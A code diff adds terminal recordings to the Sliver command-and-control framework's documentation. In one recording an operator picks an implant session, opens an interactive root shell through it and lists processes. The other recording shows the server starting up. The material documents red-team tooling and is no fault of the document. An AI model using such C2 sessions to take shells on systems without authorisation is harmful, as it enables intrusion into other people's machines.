UTC\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[?25l\u001b[107D"] +[4.258708, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.260891, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[5.300667, "o", "\u001b[?25l"] +[5.302348, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.306497, "o", "\u001b[6n"] +[5.312894, "o", "u\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[5.313942, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[5.384875, "o", "\u001b[?25l\u001b[107D"] +[5.385457, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.389899, "o", "us\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[5.449016, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.453269, "o", "\u001b[1m\u001b[32muse\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[5.454408, "o", "\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[5.629541, "o", "\u001b[12D\u001b[9C"] +[5.631616, "o", "\u001b[6n"] +[5.65189, "o", "\u001b[107D\u001b[12C\u001b[0J\u001b[107D\r\r\n"] +[5.65267, "o", "\u001b[0 q"] +[5.653889, "o", "\r\n"] +[5.686583, "o", "\u001b7\u001b[?25l"] +[5.686761, "o", "\u001b8"] +[5.691331, "o", "\u001b[0G\u001b[2K"] +[5.69971, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> SESSION e783b0c4 CURRENT_RESIST 127.0.0.1:60034 98df0494f659 root linux/amd64\u001b[0m\r\n"] +[5.700278, "o", "\u001b7"] +[5.703075, "o", "\u001b[1A"] +[5.703177, "o", "\u001b[0G"] +[6.170331, "o", "\u001b8\u001b[?25h\u001b8\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m\u001b[0;36m SESSION e783b0c4 CURRENT_RESIST 127.0.0.1:60034 98df0494f659 root linux/amd64\u001b[0m\r\n"] +[6.174529, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mActive session CURRENT_RESIST (e783b0c4-a506-4030-8059-5044f387ea88)\r\n"] +[6.222445, "o", "\r\n"] +[6.23339, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[1 q"] +[6.233882, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[6.235971, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[26D\u001b[26C\u001b[107D\u001b[26C\u001b[?25h"] +[6.87546, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[6.880679, "o", "\u001b[6n"] +[6.888371, "o", "s\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[6.892671, "o", "\u001b[107D\u001b[1A\u001b[27D\u001b[26C\u001b[107D\u001b[27C\u001b[?25h"] +[6.946863, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[6.951893, "o", "sh\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[28D\u001b[26C\u001b[107D\u001b[28C\u001b[?25h"] +[7.04774, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[7.055309, "o", "she\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.055457, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[29D\u001b[26C\u001b[107D\u001b[29C\u001b[?25h"] +[7.148565, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[7.159295, "o", "shel\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.162232, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[30D\u001b[26C\u001b[107D\u001b[30C\u001b[?25h"] +[7.284309, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[7.294552, "o", "\u001b[1m\u001b[32mshell\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[26C\u001b[107D\u001b[31C\u001b[?25h"] +[7.38584, "o", "\u001b[?25l"] +[7.387228, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[7.392813, "o", "\u001b[1m\u001b[32mshell \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[32D\u001b[26C"] +[7.393631, "o", "\u001b[107D\u001b[32C\u001b[?25h"] +[7.714403, "o", "\u001b[?25l"] +[7.71591, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[7.725962, "o", "\u001b[1m\u001b[32mshell \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[7.727816, "o", "\u001b[1A\u001b[33D\u001b[26C\u001b[107D\u001b[33C\u001b[?25h"] +[7.822833, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[7.830898, "o", "\u001b[1m\u001b[32mshell \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-h\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[26C\u001b[107D\u001b[34C\u001b[?25h"] +[7.953294, "o", "\u001b[34D\u001b[26C"] +[7.953715, "o", "\u001b[6n"] +[7.962404, "o", "\u001b[107D\u001b[34C\u001b[0J"] +[7.96533, "o", "\u001b[107D\r\r\n\u001b[0 q\r\n"] +[7.971866, "o", "Start an interactive shell\r\n\r\n"] +[7.982435, "o", "Usage:\r\n shell [flags]\r\n\r\nFlags:\r\n -h, --help help for shell\r\n -y, --no-pty disable use of pty on macos/linux\r\n -s, --shell-path string path to shell interpreter\r\n -t, --timeout int grpc timeout in seconds (default 60)\r\n"] +[7.983666, "o", "\r\n"] +[7.998655, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[7.999297, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[8.000779, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[8.00164, "o", "\u001b[107D\u001b[1A\u001b[26D\u001b[26C\u001b[107D\u001b[26C\u001b[?25h"] +[8.432029, "o", "\u001b[?25l\u001b[107D"] +[8.434496, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[8.438857, "o", "s\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[27D\u001b[26C\u001b[107D"] +[8.439795, "o", "\u001b[27C\u001b[?25h"] +[8.517995, "o", "\u001b[?25l"] +[8.518546, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[8.5206, "o", "sh\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[8.521011, "o", "\u001b[107D\u001b[1A\u001b[28D\u001b[26C\u001b[107D\u001b[28C\u001b[?25h"] +[8.663146, "o", "\u001b[?25l"] +[8.664594, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[8.6682, "o", "she\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[8.669284, "o", "\u001b[107D\u001b[1A\u001b[29D\u001b[26C\u001b[107D\u001b[29C\u001b[?25h"] +[8.763593, "o", "\u001b[?25l"] +[8.763881, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[8.76686, "o", "shel\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[8.767747, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[30D\u001b[26C\u001b[107D\u001b[30C\u001b[?25h"] +[8.896958, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[8.900344, "o", "\u001b[6n"] +[8.909045, "o", "\u001b[1m\u001b[32mshell\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[8.913696, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[26C\u001b[107D\u001b[31C\u001b[?25h"] +[9.670371, "o", "\u001b[31D\u001b[26C\u001b[6n"] +[9.683362, "o", "\u001b[107D\u001b[31C\u001b[0J\u001b[107D"] +[9.684816, "o", "\r\r\n\u001b[0 q\r\n"] +[9.703556, "o", "\u001b[0G\u001b[2K"] +[9.708032, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mThis action is bad OPSEC, are you an adult? \u001b[0m\u001b[0;37m(y/N) \u001b[0m"] +[9.710627, "o", "\u001b[?25l\u001b7\u001b[999;999f\u001b[6n"] +[9.71436, "o", "\u001b8\u001b[?25h\u001b[6n"] +[10.373281, "o", "y"] +[10.65143, "o", "\u001b[1D\r\n\u001b[1B\u001b[0G\u001b[1A\u001b[0G"] +[10.65768, "o", "\u001b[0G\u001b[2K"] +[10.668002, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mThis action is bad OPSEC, are you an adult? \u001b[0m\u001b[0;36mYes\u001b[0m\r\n"] +[10.669974, "o", "\r\n"] +[10.671666, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mWait approximately 10 seconds after exit, and press to continue\r\n\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mOpening shell tunnel (EOF to exit) ...\r\n\r\n"] +[10.799989, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mStarted remote shell with pid 14798\r\n\r\n"] +[10.893078, "o", "\u001b[?2004h"] +[10.901365, "o", "root@98df0494f659:~# "] +[12.351295, "o", "p"] +[12.400776, "o", "w"] +[12.458265, "o", "d"] +[12.558938, "o", "\r\n"] +[12.564499, "o", "\u001b[?2004l\r/root\r\n"] +[12.564786, "o", "\u001b[?2004hroot@98df0494f659:~# "] +[13.283473, "o", "p"] +[13.347332, "o", "s"] +[13.447738, "o", " "] +[13.569948, "o", "a"] +[13.651951, "o", "u"] +[13.74698, "o", "x"] +[13.901878, "o", "\r\n"] +[13.905982, "o", "\u001b[?2004l\r"] +[13.964101, "o", "USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\r\n"] +[13.968729, "o", "root 1 0.0 0.5 150092 10356 pts/0 Ssl 12:51 0:01 /usr/bin/qemu-x\r\nroot 14557 0.0 0.5 150096 10884 pts/0 Sl+ 15:33 0:00 /usr/bin/qemu-x\r\nroot 14562 0.8 0.8 153188 16916 ? Rsl 15:33 0:03 /usr/bin/qemu-x\r\nroot 14564 0.0 0.7 150056 15236 pts/1 Ssl 15:33 0:00 /usr/bin/qemu-x\r\nroot 14576 0.0 0.6 149924 13864 pts/2 Ssl 15:33 0:00 /usr/bin/qemu-x\r\nroot 14756 5.8 2.6 254848 54372 pts/1 Sl+ 15:40 0:00 /usr/bin/qemu-x\r\nroot 14759 1.5 2.2 179932 45888 pts/1 Sl+ 15:40 0:00 /usr/bin/qemu-x\r\n"] +[13.972967, "o", "root 14761 0.0 2.2 179840 44944 pts/1 Sl+ 15:40 0:00 /usr/bin/qemu-x\r\nroot 14763 0.0 0.4 147028 8168 pts/3 Ssl 15:40 0:00 /usr/bin/qemu-x\r\nroot 14766 0.5 0.6 150132 14128 pts/3 Sl 15:40 0:00 /usr/bin/qemu-x\r\nroot 14776 37.1 8.5 1586752 174620 pts/3 Sl+ 15:40 0:04 /usr/bin/qemu-x\r\nroot 14788 11.3 3.2 1402788 65644 pts/2 Rl+ 15:40 0:01 /usr/bin/qemu-x\r\nroot 14798 2.6 0.7 149888 15152 pts/4 Ssl 15:40 0:00 /usr/bin/qemu-x\r\nroot 14808 0.0 0.5 151556 11160 ? Rl+ 12:46 0:00 /usr/bin/ps aux\r\n"] +[13.974954, "o", "\u001b[?2004hroot@98df0494f659:~# "] +[14.859878, "o", "e"] +[14.981544, "o", "x"] +[15.186988, "o", "i"] +[15.300042, "o", "t"] +[16.317173, "o", "\r\n\u001b[?2004l\r"] +[16.317907, "o", "exit\r\n"] +[27.335347, "o", "Shell exited\r\n"] +[27.335779, "o", "\r\n"] +[27.345826, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[27.345955, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[27.346606, "o", "\u001b[6n"] +[27.34811, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[26D\u001b[26C\u001b[107D\u001b[26C\u001b[?25h"] +[27.410752, "o", "^C\u001b[26D\u001b[26C\u001b[6n"] +[27.412331, "o", "\u001b[107D\u001b[28C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[27.412687, "o", "\r\n"] +[27.422394, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[27.423261, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.42469, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[27.425042, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[26D\u001b[26C\u001b[107D\u001b[26C\u001b[?25h"] +[27.494698, "o", "^C\u001b[26D\u001b[26C\u001b[6n"] +[27.503282, "o", "\u001b[107D\u001b[28C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n\r\n"] +[27.507134, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[27.507504, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.509273, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[26D\u001b[26C\u001b[107D\u001b[26C\u001b[?25h"] +[27.578246, "o", "^C\u001b[26D\u001b[26C\u001b[6n"] +[27.579453, "o", "\u001b[107D\u001b[28C\u001b[0J\u001b[107D\r"] +[27.580014, "o", "\r\n\u001b[0 q\r\n\r\n"] +[27.591116, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[27.591516, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.592964, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[26D\u001b[26C"] +[27.593261, "o", "\u001b[107D\u001b[26C\u001b[?25h"] +[27.661634, "o", "^C\u001b[26D\u001b[26C\u001b[6n"] +[27.663187, "o", "\u001b[107D\u001b[28C\u001b[0J\u001b[107D\r\r\n"] +[27.664506, "o", "\u001b[0 q\r\n\r\n"] +[27.67636, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[27.676498, "o", "\u001b[1 q\u001b[?25l\u001b[107D"] +[27.676539, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[27.678253, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[26D\u001b[26C\u001b[107D\u001b[26C\u001b[?25h"] +[29.665521, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[29.670934, "o", "b\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[27D"] +[29.6716, "o", "\u001b[26C\u001b[107D\u001b[27C\u001b[?25h"] +[29.719423, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[29.722677, "o", "ba\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[28D\u001b[26C\u001b[107D\u001b[28C\u001b[?25h"] +[29.791499, "o", "\u001b[?25l\u001b[107D"] +[29.792368, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[29.794811, "o", "bac\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[29D\u001b[26C\u001b[107D\u001b[29C\u001b[?25h"] +[29.896305, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[29.896713, "o", "\u001b[6n"] +[29.90024, "o", "back\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[29.90097, "o", "\u001b[1A\u001b[30D\u001b[26C\u001b[107D\u001b[30C\u001b[?25h"] +[30.048424, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[30.05971, "o", "backg\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[26C\u001b[107D\u001b[31C\u001b[?25h"] +[30.109396, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[30.111245, "o", "\u001b[6n"] +[30.114003, "o", "backgr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[32D\u001b[26C\u001b[107D\u001b[32C\u001b[?25h"] +[30.138994, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[30.141645, "o", "backgro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[26C\u001b[107D\u001b[33C\u001b[?25h"] +[30.197303, "o", "\u001b[?25l"] +[30.198156, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[30.20018, "o", "backgrou\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[26C\u001b[107D\u001b[34C\u001b[?25h"] +[30.236701, "o", "\u001b[?25l"] +[30.236881, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[30.238892, "o", "backgroun\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[30.239186, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[26C\u001b[107D\u001b[35C\u001b[?25h"] +[30.342878, "o", "\u001b[?25l\u001b[107D"] +[30.343265, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[30.345535, "o", "\u001b[1m\u001b[32mbackground\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[36D\u001b[26C\u001b[107D\u001b[36C\u001b[?25h"] +[30.442674, "o", "\u001b[36D\u001b[26C\u001b[6n"] +[30.444974, "o", "\u001b[107D\u001b[36C\u001b[0J\u001b[107D\r\r\n"] +[30.445432, "o", "\u001b[0 q\r\n"] +[30.469446, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBackground ...\r\n\r\n"] +[30.479795, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[30.480886, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[30.482318, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[30.643778, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[30.647913, "o", "\u001b[6n"] +[30.657421, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[30.776676, "o", "\u001b[?25l"] +[30.780491, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[30.789737, "o", "ex\u001b[0m\u001b[0K\u001b[49m"] +[30.79069, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[30.855034, "o", "\u001b[?25l"] +[30.856775, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[30.86476, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[30.864993, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[12D\u001b[9C\u001b[107D\u001b[12C\u001b[?25h"] +[31.035261, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[31.04693, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[31.047674, "o", "\u001b[1A\u001b[13D\u001b[9C\u001b[107D\u001b[13C\u001b[?25h"] +[31.527869, "o", "\u001b[13D\u001b[9C\u001b[6n"] +[31.5304, "o", "\u001b[107D\u001b[13C\u001b[0J\u001b[107D\r\r\n"] +[31.531474, "o", "\u001b[0 q\r\n"] +[31.540564, "o", "Exiting...\r\n"] +[31.556719, "o", "\u001b[?2004hroot@98df0494f659:~# "] +[31.924303, "o", "e"] +[32.172526, "o", "x"] +[32.398663, "o", "i"] +[32.53265, "o", "t"] +[33.211504, "o", "\r\n"] +[33.213445, "o", "\u001b[?2004l\rexit\r\n"] diff --git a/docs/sliver-docs/public/asciinema/startup.cast b/docs/sliver-docs/public/asciinema/startup.cast new file mode 100644 index 0000000000..7942ed37c3 --- /dev/null +++ b/docs/sliver-docs/public/asciinema/startup.cast @@ -0,0 +1,79 @@ +{"version": 2, "width": 266, "height": 92, "timestamp": 1714563838, "env": {"SHELL": null, "TERM": "xterm"}} +[0.0335, "o", "# "] +[1.026138, "o", "."] +[1.27035, "o", "/"] +[1.990462, "o", "s"] +[2.104733, "o", "l"] +[2.18274, "o", "i"] +[2.324536, "o", "v"] +[2.459428, "o", "e"] +[2.563262, "o", "r"] +[2.917731, "o", "-"] +[3.197754, "o", "s"] +[3.236411, "o", "e"] +[3.28984, "o", "r"] +[3.512507, "o", "v"] +[3.731953, "o", "e"] +[3.855727, "o", "r"] +[4.224416, "o", "\r\n"] +[4.924834, "o", "\r\nSliver Copyright (C) 2022 Bishop Fox\r\nThis program comes with ABSOLUTELY NO WARRANTY; for details type 'licenses'.\r\nThis is free software, and you are welcome to redistribute it\r\nunder certain conditions; type 'licenses' for details.\r\n\r\nUnpacking assets ...\r\n"] +[15.06029, "o", "\u001b[32m\r\r\n ███████╗██╗ ██╗██╗ ██╗███████╗██████╗\r\r\n ██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗\r\r\n ███████╗██║ ██║██║ ██║█████╗ ██████╔╝\r\r\n ╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗\r\r\n ███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║\r\r\n ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝\r\r\n\u001b[0m\r\nAll hackers gain first strike\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - 0b235b4d42d4eb75684825f5d5b30da71ec57d26 - \u001b[1mDirty\u001b[0m\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n"] +[15.063896, "o", "\r\n"] +[15.088787, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[15.090324, "o", "\u001b[1 q"] +[15.092416, "o", "\u001b[?25l"] +[15.092815, "o", "\u001b[266D"] +[15.093453, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[15.094487, "o", "\u001b[6n"] +[15.097509, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[15.098359, "o", "\r\r\n\u001b[0K\u001b[0J"] +[15.099345, "o", "\u001b[266D\u001b[1A\u001b[9D\u001b[9C\u001b[266D\u001b[9C\u001b[?25h"] +[16.450333, "o", "\u001b[?25l"] +[16.452271, "o", "\u001b[266D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[16.456684, "o", "\u001b[6n"] +[16.472371, "o", "h\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[16.473216, "o", "\u001b[0K\u001b[0J\u001b[266D\u001b[1A\u001b[10D\u001b[9C\u001b[266D\u001b[10C\u001b[?25h"] +[16.853991, "o", "\u001b[?25l"] +[16.856214, "o", "\u001b[266D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[16.864284, "o", "he\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[16.86466, "o", "\u001b[0K\u001b[0J\u001b[266D\u001b[1A\u001b[11D\u001b[9C\u001b[266D\u001b[11C\u001b[?25h"] +[16.947679, "o", "\u001b[?25l\u001b[266D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[16.955882, "o", "hel\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[16.957194, "o", "\u001b[0K\u001b[0J\u001b[266D\u001b[1A\u001b[12D\u001b[9C\u001b[266D\u001b[12C\u001b[?25h"] +[17.013552, "o", "\u001b[?25l\u001b[266D"] +[17.015213, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[17.02521, "o", "\u001b[1m\u001b[32mhelp\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[266D"] +[17.025821, "o", "\u001b[1A\u001b[13D\u001b[9C\u001b[266D\u001b[13C\u001b[?25h"] +[17.502966, "o", "\u001b[13D\u001b[9C\u001b[6n"] 